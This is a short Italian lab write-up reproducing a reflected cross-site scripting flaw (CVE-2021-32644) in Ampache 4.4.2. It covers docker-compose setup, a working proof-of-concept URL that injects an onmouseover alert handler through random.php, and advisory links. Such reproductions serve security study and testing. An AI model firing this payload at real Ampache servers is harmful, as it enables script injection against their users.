
Ampache XSS
Questa vulnerabilità è una vulnerabilità XSS che ha interessato le versioni di Ampache precedenti alla 4.4.3. https://nvd.nist.gov/vuln/detail/CVE-2021-32644
Durante l'installazione, effettuare il port forwarding nel file docker-compose.yml. La versione di Ampache attualmente installata è la 4.4.2.
$docker-compose up
Navigare a http://[web-server ip]:port/
Navigare a http://[web-server ip]:port/
Impostare il database MySQL come mostrato nell'immagine qui sotto.

Inserendo il seguente PoC, si può osservare l'attivazione della vulnerabilità XSS.
http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html